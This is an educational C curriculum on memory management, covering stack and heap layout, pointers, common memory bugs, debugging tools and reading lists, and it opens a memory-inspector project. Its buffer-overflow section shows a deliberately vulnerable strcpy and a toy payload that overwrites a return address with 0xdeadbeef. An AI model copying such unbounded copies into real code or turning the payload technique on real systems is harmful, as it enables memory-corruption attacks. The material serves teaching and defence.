SPRINT 1 REAL WORLD PROJECTS
Sprint 1: Memory & Control - Real World Projects
Goal: Deeply understand memory management and control in C—what memory actually is, why it’s dangerous, how to master it, and why this knowledge is the foundation of all systems programming.
Project Overview Table
| # | Project | Core Topics Covered | Difficulty |
|---|---|---|---|
| 1 | Memory Inspector Tool | Pointers & Addresses, Stack vs Heap Visualization, Memory Layout, %p Formatting, lldb Debugging | Intermediate |
| 2 | Safe String Library | C String Internals, Null Terminators, Buffer Overflow Prevention, Bounds Checking, Pointer Arithmetic | Intermediate |
| 3 | Memory Leak Detector | malloc/free Tracking, Memory Leaks, Double-Free Detection, Use-After-Free, Object Lifetime & Ownership | Intermediate |
| 4 | Arena Allocator | Bump Allocation, Custom Allocators, mmap System Call, Memory Alignment, O(1) Allocation/Bulk-Free | Intermediate |
| 5 | Exploit Lab (Buffer Overflow) | Buffer Overflow Exploitation, Stack Frame Layout, Return Address Overwriting, ASLR/Canaries/NX, Security Mitigations | Advanced |
---
Why Memory & Control Matters
In 1972, Dennis Ritchie created C at Bell Labs to rewrite Unix. His design choice was radical: give programmers direct access to memory addresses. No safety net. No garbage collector. Just raw power and raw responsibility.
That decision shaped the next 50 years of computing:
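- The Linux kernel (over 30 million lines of code, mostly C) runs on the vast majority of the world’s top 1 million web servers (a widely cited figure is 96.3%)
- Many of the most famous security vulnerabilities exploited C memory bugs: Heartbleed was a buffer over-read in OpenSSL, and the Morris Worm spread partly through a buffer overflow in fingerd
- CVE statistics: Microsoft and Google’s Chromium project have each reported that roughly 70% of their serious security vulnerabilities are memory safety issues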
- The billion-dollar bugs: Buffer overflows alone have caused estimated damages in the tens of billions of dollars
Why does C remain dominant despite these dangers? Because understanding memory is understanding computing:
High-level abstraction What you think happens
↓
let x = [1, 2, 3] → "Create an array"
↓
Low-level reality What actually happens
↓
ptr = malloc(12) → Ask the allocator for 12 bytes (at an address like 0x7f3a...)
*(int*)ptr = 1 → Write 0x00000001 to bytes 0-3
*(int*)((char*)ptr + 4) = 2 → Write 0x00000002 to bytes 4-7
*(int*)((char*)ptr + 8) = 3 → Write 0x00000003 to bytes 8-11

Every Python list, every JavaScript object, every Rust Vec—underneath, it’s all pointers and bytes. Languages just hide this from you. C shows you the truth.
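The byte-level sequence above can be written as real C. In this sketch, `build_array_by_hand` is a hypothetical name. It allocates raw bytes and stores each int at an explicit byte offset with `memcpy`. It uses `sizeof(int)` rather than assuming 4, though the offsets come out to 0, 4 and 8 on the platforms the diagram describes.

```c
#include <stdlib.h>
#include <string.h>

/* Builds {1, 2, 3} "by hand": allocate raw bytes, then store each int at an
   explicit byte offset [i * sizeof(int), (i + 1) * sizeof(int)). */
int *build_array_by_hand(void) {
    unsigned char *raw = malloc(3 * sizeof(int));
    if (raw == NULL)
        return NULL;
    for (size_t i = 0; i < 3; i++) {
        int value = (int)i + 1;
        memcpy(raw + i * sizeof(int), &value, sizeof value);
    }
    return (int *)raw;   /* the same bytes, now viewed as int[3] */
}
```

The caller gets back an ordinary `int *`. `a[1]` reads exactly the bytes written at offset `sizeof(int)`, and the caller owns the block and must `free()` it.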
The Memory Hierarchy: What You’re Really Working With

When you write int x = 42;, you’re not just “storing a number”; you’re participating in this entire hierarchy. Understanding it is what lets C programmers write code that runs many times faster (sometimes 10-100x) than a naive implementation, for example by arranging data so the CPU caches are used well.
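Traversal order is one place where the hierarchy shows up in ordinary C. The sketch below sums the same 2D array two ways. The function names and the 512 by 512 size are arbitrary choices for illustration. Both functions return the same total. The row-major loop reads consecutive addresses, while the column-major loop jumps a whole row each step, so on typical hardware it causes far more cache misses. Time both with `clock()` to see the gap on your machine. The exact ratio varies, and it grows once the array no longer fits in cache.

```c
#include <stddef.h>

#define ROWS 512
#define COLS 512

/* Row-major: consecutive iterations read adjacent ints, so each cache line
   pulled in from RAM is fully used before the loop moves on. */
long long sum_row_major(int grid[ROWS][COLS]) {
    long long total = 0;
    for (size_t r = 0; r < ROWS; r++)
        for (size_t c = 0; c < COLS; c++)
            total += grid[r][c];
    return total;
}

/* Column-major: consecutive iterations are COLS * sizeof(int) bytes apart,
   so nearly every read touches a different cache line. */
long long sum_col_major(int grid[ROWS][COLS]) {
    long long total = 0;
    for (size_t c = 0; c < COLS; c++)
        for (size_t r = 0; r < ROWS; r++)
            total += grid[r][c];
    return total;
}
```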
Core Concept Analysis
The Big Picture: A Process’s Memory Layout
When your program runs, the operating system gives it a virtual address space. Here’s what it looks like:
High addresses (0xFFFFFFFF...)
┌────────────────────────────┐
│ Kernel Space │ ← You can't touch this
│ (OS code and data) │
├────────────────────────────┤ 0x7FFF...
│ │
│ Stack │ ← Local variables, return addresses
│ ↓ │ Grows DOWN toward lower addresses
│ │
│ (empty) │
│ │
│ ↑ │
│ Heap │ ← malloc'd memory
│ │ Grows UP toward higher addresses
├────────────────────────────┤
│ BSS │ ← Uninitialized global variables
├────────────────────────────┤
│ Data │ ← Initialized global variables
├────────────────────────────┤
│ Text │ ← Your compiled code (read-only)
└────────────────────────────┘
Low addresses (0x00000000...)
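To see this layout on your own machine, you can print one address from each region. The names in this sketch are hypothetical. It skips the Text segment because converting a function pointer to an object pointer isn’t portable C. Exact addresses, and even the relative order of regions, depend on the OS, the allocator and ASLR, so treat the output as an observation rather than a guarantee.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int initialized_global = 42;   /* Data: initialized globals */
int uninitialized_global;      /* BSS: zero-initialized globals */

/* One sample address per region, kept as integers because the heap block is
   freed and the local goes out of scope before anyone looks at them. */
struct region_addrs {
    uintptr_t data, bss, heap, stack;
};

struct region_addrs sample_regions(void) {
    int local = 0;                          /* Stack */
    int *block = malloc(sizeof *block);     /* Heap */
    struct region_addrs r = {
        .data  = (uintptr_t)&initialized_global,
        .bss   = (uintptr_t)&uninitialized_global,
        .heap  = (uintptr_t)block,
        .stack = (uintptr_t)&local,
    };
    free(block);
    return r;
}

void print_regions(void) {
    struct region_addrs r = sample_regions();
    printf("stack: %p\n", (void *)r.stack);
    printf("heap:  %p\n", (void *)r.heap);
    printf("bss:   %p\n", (void *)r.bss);
    printf("data:  %p\n", (void *)r.data);
}
```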

Every C program you write operates within this structure. Let’s break down each region:
1. The Stack: Automatic Memory Management
The stack is where local variables live. It’s called a “stack” because it works exactly like a stack of plates:
void foo() {
int a = 1; // Pushed onto stack
int b = 2; // Pushed onto stack
bar(); // bar's frame pushed on top
} // a and b automatically "popped" (destroyed)
Stack during foo():
┌─────────────────────┐ High addresses
│ Return address │ ← Where to go after foo() returns
├─────────────────────┤
│ Saved registers │ ← Previous function's state
├─────────────────────┤
│ int b = 2 │ ← Local variable
├─────────────────────┤
│ int a = 1 │ ← Local variable
├─────────────────────┤
│ ... │
└─────────────────────┘ Low addresses (stack grows down)

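Key insight: The stack is fast (allocating a frame just moves the stack pointer) but limited (typically 8 MB by default for the main thread on Linux). It’s also ephemeral: when a function returns, its stack frame is gone. That’s why using a pointer to a local variable after its function has returned is undefined behavior. The address is still there, but the object it named no longer exists.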
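A quick way to watch frames pile up is to record the address of a local variable at several recursion depths. The names in this sketch are hypothetical. Each call’s `marker` lives in its own frame. Every shallower frame is still alive when a deeper one records its address, so the recorded addresses are guaranteed to differ. On x86-64 and ARM64 they will typically decrease with depth. The addresses are stored as `uintptr_t` and only printed, never dereferenced after the frames are gone.

```c
#include <stdint.h>
#include <stdio.h>

#define MAX_DEPTH 4

/* Records the address of one local per active call frame. */
void record_frames(uintptr_t out[], int depth, int max_depth) {
    volatile int marker = depth;            /* lives in this call's frame */
    out[depth] = (uintptr_t)&marker;
    if (depth + 1 < max_depth)
        record_frames(out, depth + 1, max_depth);
    (void)marker;                           /* frame stays live until here */
}

void print_frames(void) {
    uintptr_t addrs[MAX_DEPTH];
    record_frames(addrs, 0, MAX_DEPTH);
    for (int i = 0; i < MAX_DEPTH; i++)
        printf("depth %d: marker at %p\n", i, (void *)addrs[i]);
}
```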
2. The Heap: Manual Memory Management
The heap is where malloc() gets memory. Unlike the stack, you control when memory is allocated and freed:
int* create_array(int size) {
int* arr = malloc(size * sizeof(int)); // Ask heap for memory
return arr; // Valid! Heap memory persists
} // But who frees it?
Heap layout (simplified):
┌────────────────────────────────────────────┐
│ Header │ User Data │ ← malloc(100)
│ 8 bytes│ 100 bytes │
├────────┼───────────────────────────────────┤
│ Header │ Free space (fragmented) │ ← Was freed
├────────┼───────────────────────────────────┤
│ Header │ User Data │ ← malloc(50)
│ 8 bytes│ 50 bytes │
└────────┴───────────────────────────────────┘

Key insight: Typical allocators store metadata (such as the block’s size and an in-use flag) right next to each allocation. That’s how free() knows how much to deallocate when you pass it only a pointer. Corrupt this metadata, and you corrupt the heap allocator itself.
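The header idea can be sketched on top of `malloc` itself. The wrapper below uses the hypothetical names `sized_malloc`, `sized_size` and `sized_free`. It stores the requested size just before the pointer it returns, which is roughly how many allocators let `free()` find a block’s size. Real allocators such as glibc’s use more elaborate headers, and some keep size information elsewhere entirely.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Header placed in front of every block. The max_align_t member rounds the
   header's size up to the strictest alignment, so the user pointer that
   follows it is as well aligned as plain malloc's. */
typedef union {
    size_t size;
    max_align_t align;
} block_header;

void *sized_malloc(size_t size) {
    if (size > SIZE_MAX - sizeof(block_header))
        return NULL;                            /* size + header would overflow */
    block_header *h = malloc(sizeof(block_header) + size);
    if (h == NULL)
        return NULL;
    h->size = size;                             /* metadata lives before the data */
    return h + 1;                               /* caller only sees the data part */
}

size_t sized_size(const void *p) {
    return ((const block_header *)p - 1)->size; /* step back to the header */
}

void sized_free(void *p) {
    if (p != NULL)
        free((block_header *)p - 1);            /* free the real start of the block */
}
```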
3. Pointers: Just Numbers That Are Addresses
A pointer is not magic. It’s just a number that happens to be interpreted as a memory address:
int x = 42;
int* p = &x;
// What's actually happening:
// x lives at address 0x7ffeefbff4ac
// p contains the VALUE 0x7ffeefbff4ac
// *p means "go to that address and read the int there"
printf("Value of p: %p\n", (void*)p); // 0x7ffeefbff4ac
printf("Value of *p: %d\n", *p); // 42
printf("Value of x: %d\n", x); // 42
Pointer arithmetic follows type sizes:
int arr[3] = {10, 20, 30};
int* p = arr;
p + 1 // Not "address + 1 byte"
// It's "address + sizeof(int) bytes"
// So p + 1 points to arr[1], not some random byte
Pointer Arithmetic Visualization:
Memory Addresses and Values (int = 4 bytes):
Address: 0x1000 0x1004 0x1008 0x100C
┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
Value: │ 10 │ │ 20 │ │ 30 │ │ (next) │
└──────────┘ └──────────┘ └──────────┘ └──────────┘
▲ ▲ ▲
│ │ │
p p+1 p+2
Key Insight: p + 1 moves by sizeof(int) = 4 bytes, NOT 1 byte!
If p were a char*:
Address: 0x1000 0x1001 0x1002 0x1003
┌─────┐ ┌─────┐ ┌─────┐ ┌─────┐
Value: │ 'A' │ │ 'B' │ │ 'C' │ │ 'D' │
└─────┘ └─────┘ └─────┘ └─────┘
▲ ▲
│ │
p p+1
Now p + 1 moves by sizeof(char) = 1 byte
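You can measure the step size directly by subtracting `char *` views of `p` and `p + 1`, which counts bytes instead of elements. The helper names are hypothetical. On typical desktop platforms `int_step_bytes()` returns 4.

```c
#include <stddef.h>

/* Bytes between p and p + 1 for an int pointer: sizeof(int). */
ptrdiff_t int_step_bytes(void) {
    int arr[3] = {10, 20, 30};
    int *p = arr;
    return (char *)(p + 1) - (char *)p;
}

/* Bytes between p and p + 1 for a char pointer: always 1. */
ptrdiff_t char_step_bytes(void) {
    char letters[4] = {'A', 'B', 'C', 'D'};
    char *p = letters;
    return (p + 1) - p;
}

/* p + i points at element i, so *(p + i) is the same access as p[i]. */
int element_at(const int *p, size_t i) {
    return *(p + i);
}
```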

4. Memory Bugs: The Rogues Gallery
Every memory bug falls into a few categories. Understanding them is understanding why C is dangerous:
Buffer Overflow
char buffer[10];
strcpy(buffer, "This string is way too long!");
// Overwrites memory PAST the buffer
// Could overwrite return address → attacker controls execution
Buffer Overflow Stack Corruption - Step by Step (simplified frame: 4-byte slots, little-endian):
STEP 1: Normal Stack Frame BEFORE strcpy
========================================
Function: vulnerable()
char buffer[10];
strcpy(buffer, "This string is way too long!");
Stack Layout:
High Addresses (stack grows DOWN)
┌──────────────────────────┐
│ Return Address │ ← 0x7fff4ff4 Where to go after function returns
│ (points to caller) │ (e.g., 0x400123)
├──────────────────────────┤
│ Saved Frame Pointer │ ← 0x7fff4ff0
├──────────────────────────┤
│ (2 padding bytes) │ ← 0x7fff4fee
├──────────────────────────┤
│ buffer[9] │ ← 0x7fff4fed
│ buffer[8] │
│ buffer[7] │
│ buffer[6] │
│ buffer[5] │
│ buffer[4] │
│ buffer[3] │
│ buffer[2] │
│ buffer[1] │
│ buffer[0] │ ← 0x7fff4fe4 (buffer starts here)
├──────────────────────────┤
│ (other locals) │
└──────────────────────────┘
Low Addresses
STEP 2: During strcpy - Bytes Being Written
============================================
Source: "This string is way too long!" (28 chars + '\0' = 29 bytes!)
Dest: buffer (only 10 bytes allocated!)
┌──────────────────────────┐
│ Caller's frame │ ← "oo long!\0" lands here too!
├──────────────────────────┤
│ Return Address │ ← Will be OVERWRITTEN!
│ 0x400123 → 0x74207961 │ (bytes "ay t" read little-endian)
├──────────────────────────┤
│ Saved Frame Pointer │ ← Will be OVERWRITTEN!
│ → 0x77207369 │ (bytes "is w" read little-endian)
├──────────────────────────┤
│ 'i' 'n' 'g' ' ' │ ← buffer[8-9] (valid), then 2 bytes PAST END OF BUFFER
│ ' ' 's' 't' 'r' │ ← buffer[4-7] (valid)
│ 'T' 'h' 'i' 's' │ ← buffer[0-3] (valid)
├──────────────────────────┤
STEP 3: After strcpy - CORRUPTED!
==================================
┌──────────────────────────┐
│ Return Address │
│ 0x74207961 ("ay t") │ ← CORRUPTED! Not a valid code address
├──────────────────────────┤
│ Saved Frame Pointer │
│ 0x77207369 ("is w") │ ← CORRUPTED!
├──────────────────────────┤
│ 'i' 'n' 'g' ' ' │
│ ' ' 's' 't' 'r' │
│ 'T' 'h' 'i' 's' │
└──────────────────────────┘
STEP 4: When Function Returns - CRASH!
=======================================
CPU tries to:
1. Pop return address from stack → gets 0x74207961
2. Jump to that address
3. 0x74207961 is NOT valid executable code!
4. SEGMENTATION FAULT!
With a carefully crafted exploit:
strcpy(buffer, "AAAAAAAAAAAAAAAA" "\xef\xbe\xad\xde");
↑ 16 filler bytes ↑ Attacker's address (little-endian)
(10 for buffer + 2 padding + 4 saved frame pointer)
Return address becomes 0xdeadbeef → attacker controls execution!
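The fix for the `strcpy` above is to pass the destination’s size to a function that respects it. This minimal sketch uses the standard `snprintf`, which never writes more than `dst_size` bytes and always terminates the string when `dst_size > 0`. `copy_bounded` is a hypothetical name. It reports truncation to the caller instead of hiding it.

```c
#include <stddef.h>
#include <stdio.h>

/* Bounded replacement for strcpy(dst, src): snprintf writes at most dst_size
   bytes, including the terminating '\0', and returns the length it would
   have needed. Returns 1 if src fit completely, 0 if it was truncated. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    int needed = snprintf(dst, dst_size, "%s", src);
    return needed >= 0 && (size_t)needed < dst_size;
}
```

With the 10-byte buffer from the example, `copy_bounded(buffer, sizeof buffer, "This string is way too long!")` stores `"This stri"` and returns 0. It does not overwrite the saved frame pointer and return address.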

Use-After-Free
int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p still contains the old address, but memory is now "free"
*p = 100; // UNDEFINED! Memory might be reused
Memory Bug Lifecycle - Use-After-Free Timeline:
Timeline of a Use-After-Free Bug:
T=0: Allocation
┌──────────────────────┐
│ int* p = malloc(...) │──┐
└──────────────────────┘ │
▼
Heap: [p → 0x1000] → ┌─────────┐
│ 42 │ Status: VALID
└─────────┘
T=1: Use (OK)
┌────────┐
│ *p = 42│ ✓ Works fine
└────────┘
T=2: Free
┌──────────┐
│ free(p) │──┐
└──────────┘ │
▼
Heap: [p → 0x1000] → ┌─────────┐
│ 42 │ Status: FREED (memory returned to allocator)
└─────────┘
p is now a DANGLING POINTER!
T=3: Reuse (somewhere else in program)
┌────────────────────────────┐
│ char* s = malloc(4); │──┐
│ strcpy(s, "ABC"); │ │
└────────────────────────────┘ ▼
Heap: [s → 0x1000] → ┌─────────┐
[p → 0x1000] → │ "ABC" │ SAME ADDRESS REUSED!
└─────────┘
T=4: Use-After-Free BUG!
┌─────────┐
│ *p = 100│ ← Writing to freed memory!
└─────────┘
│
▼
Heap: [s → 0x1000] → ┌─────────┐
[p → 0x1000] → │ 100 │ CORRUPTED s's data!
└─────────┘
Result: Undefined behavior! Could:
- Silently corrupt other data (like above)
- Crash immediately
- Work fine (memory not yet reused) ← WORST: bug appears later!
- Security vulnerability (attacker controls what's at that address)
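A common defensive habit is to null the pointer immediately after freeing it. The macro below is a widespread idiom, not a standard library feature, and `FREE_AND_NULL` and `make_counter` are hypothetical names. It turns a later `*p` into a NULL dereference, which usually crashes immediately instead of silently corrupting reused memory. It also makes an accidental second free harmless, because `free(NULL)` does nothing. It only clears the one variable you pass, so any other copies of the pointer still dangle.

```c
#include <stdlib.h>

/* Free p, then overwrite the caller's variable so it can't be reused. */
#define FREE_AND_NULL(p) do { free(p); (p) = NULL; } while (0)

/* Small helper that hands back a heap-allocated int set to 0. */
int *make_counter(void) {
    int *c = malloc(sizeof *c);
    if (c != NULL)
        *c = 0;
    return c;
}
```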

Double-Free
int* p = malloc(sizeof(int));
free(p);
free(p); // UNDEFINED! The allocator's metadata may now be corrupted
// Next malloc might return garbage (glibc and other modern allocators often detect simple cases like this and abort)
Double-Free Heap Corruption:
How Double-Free Corrupts the Heap Allocator:
INITIAL STATE - Normal Heap:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=1 │ User Data (p points │
│ prev=NULL │ here) │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
AFTER FIRST free(p) - Correct:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=0 │ Free block │ ← Added to free list
│ next_free → ... │ (available for │
│ prev_free → ... │ reuse) │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
Free List: HEAD → [Block at p] → [Other free blocks] → NULL
AFTER SECOND free(p) - CORRUPTED:
┌────────────────────────────────────────────────────┐
│ Header: CORRUPTED! │ Double-freed block │
│ next_free → ITSELF │ ← Creates loop or │
│ prev_free → ??? │ invalid pointers │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │ Other allocation │
└────────────────────────────────────────────────────┘
Free List: HEAD → [Block at p] → [Block at p] → ∞ LOOP!
↓ ↑
└───────────────┘
CONSEQUENCES:
1. Free list is now circular or has invalid pointers
2. Next malloc() might:
- Return the same address twice → two pointers to same memory
- Crash when traversing corrupted free list
- Return garbage/invalid addresses
3. Heap metadata is corrupted → future mallocs are unpredictable
4. Security risk: Attacker can exploit to write arbitrary memory
Example of the damage (on an allocator that does not detect the double free):
int* a = malloc(16); // Might get address 0x1000
int* b = malloc(16); // Might ALSO get 0x1000! (same memory!)
*a = 42;
*b = 100;
printf("%d\n", *a); // Prints 100! (a and b are aliased)

Memory Leak
void leak() {
int* p = malloc(1000);
// Function returns without free(p)
// Those 1000 bytes are now unreachable but still allocated
}
// Call leak() 1000 times → 1MB of leaked memory
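Leaks and double frees can both be caught by keeping a table of live allocations, which is the core idea behind Project 3. This is a deliberately tiny sketch with hypothetical names (`tracked_malloc`, `tracked_free`, `live_count`) and a fixed-size table. A real detector would also record sizes and call sites. One limitation: if `malloc` reuses a freed address for a new block, a stale pointer to the old block looks live again.

```c
#include <stddef.h>
#include <stdlib.h>

#define MAX_TRACKED 1024

static void *live[MAX_TRACKED];   /* pointers currently allocated */
static size_t n_live;

void *tracked_malloc(size_t size) {
    if (n_live == MAX_TRACKED)
        return NULL;                    /* table full: refuse to allocate */
    void *p = malloc(size);
    if (p != NULL)
        live[n_live++] = p;
    return p;
}

/* Returns 0 on success, -1 if p is not a live tracked pointer
   (a double free, or a pointer this tracker never handed out). */
int tracked_free(void *p) {
    if (p == NULL)
        return 0;                       /* free(NULL) is a no-op */
    for (size_t i = 0; i < n_live; i++) {
        if (live[i] == p) {
            live[i] = live[--n_live];   /* swap-remove from the table */
            free(p);
            return 0;
        }
    }
    return -1;                          /* caught: p is NOT freed again */
}

/* Anything still live at exit is a leak. */
size_t live_count(void) {
    return n_live;
}
```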
5. Why C Doesn’t Protect You
Other languages prevent these bugs through:
| Language | Protection Mechanism |
|---|---|
| Java/Go | Garbage collector (no manual free) |
| Rust | Ownership system (compile-time checks) |
| Python | Reference counting + GC |
| JavaScript | GC + no pointer arithmetic |
C gives you none of this. Why?
- Performance: Every safety check costs cycles
- Control: Sometimes you NEED to do “unsafe” things (OS kernels, device drivers)
- Simplicity: C’s model maps directly to hardware
- History: C was designed when computers had 64KB of RAM
The tradeoff: C trusts you completely. With that trust comes power—and responsibility.
Tools for Seeing Memory
You can’t master what you can’t observe. These tools make memory visible:
1. lldb/gdb: The Debugger
$ lldb ./my_program
(lldb) breakpoint set --name main
(lldb) run
(lldb) frame variable # Show local variables
(lldb) memory read &x # Show raw bytes at address of x
(lldb) register read # Show CPU registers
2. AddressSanitizer: The Bug Finder
$ clang -fsanitize=address -g my_program.c -o my_program
$ ./my_program
# If there's a memory bug, you get a detailed report:
# ==12345==ERROR: AddressSanitizer: heap-use-after-free
# READ of size 4 at 0x602000000010
3. Valgrind: The Memory Profiler
$ valgrind --leak-check=full ./my_program
# Reports all memory leaks, invalid reads/writes
# Slower but catches more bugs
4. printf debugging (sometimes the best tool)
printf("x is at %p, value = %d\n", (void*)&x, x);
printf("p is at %p, points to %p, *p = %d\n", (void*)&p, (void*)p, *p);
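For printf debugging of raw memory, a small hex formatter is handy. This sketch (hypothetical `format_bytes`) writes bytes in address order into a caller-supplied buffer, so you can print the result or compare it in a test. For `int x = 0x12345678` on a little-endian x86-64 machine it produces `78 56 34 12`.

```c
#include <stddef.h>
#include <stdio.h>

/* Writes the n bytes at p as space-separated hex ("78 56 34 12") into out,
   in address order. Returns how many bytes were formatted, which is fewer
   than n if out is too small. */
size_t format_bytes(const void *p, size_t n, char *out, size_t out_size) {
    const unsigned char *bytes = p;
    size_t done = 0, pos = 0;
    if (out_size == 0)
        return 0;
    out[0] = '\0';
    /* Each entry needs at most 3 chars (" xx") plus room for the '\0'. */
    while (done < n && pos + 4 <= out_size) {
        pos += (size_t)snprintf(out + pos, out_size - pos,
                                done == 0 ? "%02x" : " %02x", bytes[done]);
        done++;
    }
    return done;
}
```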
Concept Summary Table
| Concept Cluster | What You Need to Internalize |
|---|---|
| Memory as bytes | Memory is just numbered boxes. Everything is bytes with interpretation layered on top. |
| The stack | Automatic, fast, limited. Local variables live here. Grows down. LIFO. |
| The heap | Manual, flexible, fragmentation-prone. malloc/free. You control lifetime. |
| Pointers as addresses | A pointer is just a number that happens to be an address. Arithmetic follows type sizes. |
| Ownership & lifetime | Who “owns” memory? When does it become invalid? Why can’t the compiler always know? |
| Failure modes | Buffer overflow, use-after-free, double-free, memory leak—these aren’t abstract, they’re observable. |
| Tooling | lldb and sanitizers show you what’s actually happening vs. what you think is happening. |
Deep Dive Reading by Concept
This section maps each concept from above to specific book chapters for deeper understanding. Read these before or alongside the projects to build strong mental models.
Memory Fundamentals (What Memory Actually Is)
| Concept | Book & Chapter |
|---|---|
| How data is represented in memory | Write Great Code, Volume 1 by Randall Hyde — Ch. 2: “Numeric Representation” & Ch. 4: “Floating-Point Representation” |
| Memory as numbered bytes | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 2: “Representing and Manipulating Information” (sections 2.1–2.2) |
| Virtual vs. physical memory | Operating Systems: Three Easy Pieces by Arpaci-Dusseau — Part II: “Virtualization” (Ch. 13-15: “Address Spaces”, “Memory API”, “Address Translation”) |
| How the CPU sees memory | Code: The Hidden Language of Computer Hardware and Software by Charles Petzold — Ch. 16: “An Assemblage of Memory” & Ch. 17: “Automation” |
The Stack (Automatic Memory)
| Concept | Book & Chapter |
|---|---|
| Function call mechanics | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3.7: “Procedures” |
| Stack frames and layout | Low-Level Programming by Igor Zhirkov — Ch. 4: “Virtual Memory” & Ch. 5: “Compilation Pipeline” (section on calling conventions) |
| Why stack grows down | The Secret Life of Programs by Jonathan Steinhart — Ch. 5: “Where Am I?” (memory layout) |
| Recursion and stack overflow | C Primer Plus by Stephen Prata — Ch. 9: “Functions” (section on recursion) |
The Heap (Manual Memory)
| Concept | Book & Chapter |
|---|---|
| How malloc/free work | The C Programming Language by Kernighan & Ritchie — Ch. 8.7: “Example—A Storage Allocator” |
| Heap data structures | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9.9: “Dynamic Memory Allocation” |
| Memory fragmentation | C Interfaces and Implementations by David Hanson — Ch. 5: “Memory Management” (the Mem interface) & Ch. 6: “More Memory Management” (the Arena interface) |
| System calls for memory | The Linux Programming Interface by Michael Kerrisk — Ch. 7: “Memory Allocation” |
Pointers (The Heart of C)
| Concept | Book & Chapter |
|---|---|
| What pointers really are | Understanding and Using C Pointers by Richard Reese — Ch. 1: “Introduction” & Ch. 2: “Dynamic Memory Management” |
| Pointer arithmetic | The C Programming Language by Kernighan & Ritchie — Ch. 5: “Pointers and Arrays” |
| Pointers and arrays relationship | Expert C Programming by Peter van der Linden — Ch. 4: “The Shocking Truth: C Arrays and Pointers Are NOT the Same!” |
| Function pointers | C Primer Plus by Stephen Prata — Ch. 14: “Structures and Other Data Forms” (section on function pointers) |
| Void pointers and casting | 21st Century C by Ben Klemens — Ch. 6: “Your Pal the Pointer” |
Memory Safety & Vulnerabilities
| Concept | Book & Chapter |
|---|---|
| Buffer overflow mechanics | Hacking: The Art of Exploitation by Jon Erickson — Ch. 3: “Exploitation” (0x300 sections) |
| Why C doesn’t protect you | Effective C by Robert Seacord — Ch. 2: “Objects, Functions, and Types” & Ch. 7: “Characters and Strings” |
| Common C security pitfalls | Secure Coding in C and C++ by Robert Seacord — Ch. 2: “Strings” & Ch. 4: “Dynamic Memory Management” |
| Use-after-free and dangling pointers | Understanding and Using C Pointers by Richard Reese — Ch. 2: “Dynamic Memory Management” (section on dangling pointers) |
Memory Debugging & Tools
| Concept | Book & Chapter |
|---|---|
| Using debuggers effectively | The Art of Debugging with GDB, DDD, and Eclipse by Matloff & Salzman — Ch. 1-3: Basics of GDB |
| Understanding memory with lldb | Low-Level Programming by Igor Zhirkov — Ch. 6: “Interrupts and System Calls” (debugger sections) |
| Reading assembly to understand memory | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3: “Machine-Level Representation of Programs” (focus on 3.1–3.5) |
Process Memory Layout
| Concept | Book & Chapter |
|---|---|
| Complete process memory map | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9: “Virtual Memory” (especially 9.7-9.8) |
| ELF format and sections | Practical Binary Analysis by Dennis Andriesse — Ch. 2: “The ELF Format” |
| How programs are loaded | The Linux Programming Interface by Michael Kerrisk — Ch. 6: “Processes” |
Essential Reading Order
For maximum comprehension, read in this order:
- Foundation (Week 1):
  - Computer Systems Ch. 2 (data representation)
  - The C Programming Language Ch. 5 (pointers)
  - Understanding and Using C Pointers Ch. 1-2 (pointer mastery)
- Stack & Heap (Week 2):
  - Computer Systems Ch. 3.7 (procedures/stack)
  - Computer Systems Ch. 9.9 (dynamic allocation)
  - The C Programming Language Ch. 8.7 (allocator example)
- Safety & Exploitation (Week 3):
  - Effective C Ch. 7 (strings and safety)
  - Hacking: The Art of Exploitation Ch. 3 (seeing bugs in action)
- Deep Understanding (Week 4+):
  - Operating Systems: Three Easy Pieces Part II (virtual memory)
  - C Interfaces and Implementations Ch. 5-6 (allocator design)
Project 1: Memory Inspector Tool
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Programming Language: C
- Coolness Level: Level 3: Genuinely Clever
- Business Potential: 2. The “Micro-SaaS / Pro Tool”
- Difficulty: Level 2: Intermediate
- Knowledge Area: Memory Management / Systems Programming
- Software or Tool: Memory Profiler
- Main Book: “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron
What you’ll build: A command-line tool that visualizes the memory layout of C programs—showing stack frames, heap allocations, variable addresses, and how they change during execution.
Why it teaches memory & control: This forces you to see memory the way lldb sees it. You’ll print addresses, observe stack growth, watch heap fragmentation, and understand that “memory” is just a big array of bytes with conventions layered on top. By building something that displays memory, you have to truly understand what memory is.
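A first building block for the inspector could be a helper that labels a variable with its name, address and size. The sketch below uses hypothetical names (`describe_var`, `DESCRIBE`) and relies on the preprocessor’s `#` operator to turn the variable name into a string. `DESCRIBE` assumes its first argument is an actual `char` array, so that `sizeof` gives the buffer’s capacity.

```c
#include <stddef.h>
#include <stdio.h>

/* Formats one line describing a variable: its name, address, and size.
   Returns snprintf's result (the length of the full line). */
int describe_var(char *out, size_t out_size, const char *name,
                 const void *addr, size_t size) {
    return snprintf(out, out_size, "Variable '%s': address %p, size %zu bytes",
                    name, (void *)addr, size);
}

/* #v stringifies the argument, so DESCRIBE(line, x) labels the output "x".
   buf must be a real char array (not a pointer) for sizeof(buf) to work. */
#define DESCRIBE(buf, v) \
    describe_var((buf), sizeof(buf), #v, (const void *)&(v), sizeof(v))
```

Typical use: `char line[128]; int x = 42; DESCRIBE(line, x); puts(line);` prints something like `Variable 'x': address 0x7ffeefbff4ac, size 4 bytes`.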
Core challenges you’ll face:
- Printing addresses with %p and understanding what they mean (maps to: what memory is)
- Observing that stack addresses decrease as you go deeper (maps to: stack layout)
- Watching heap addresses and understanding malloc return values (maps to: heap layout)
- Creating a struct and dumping its raw bytes (maps to: bytes & interpretation)
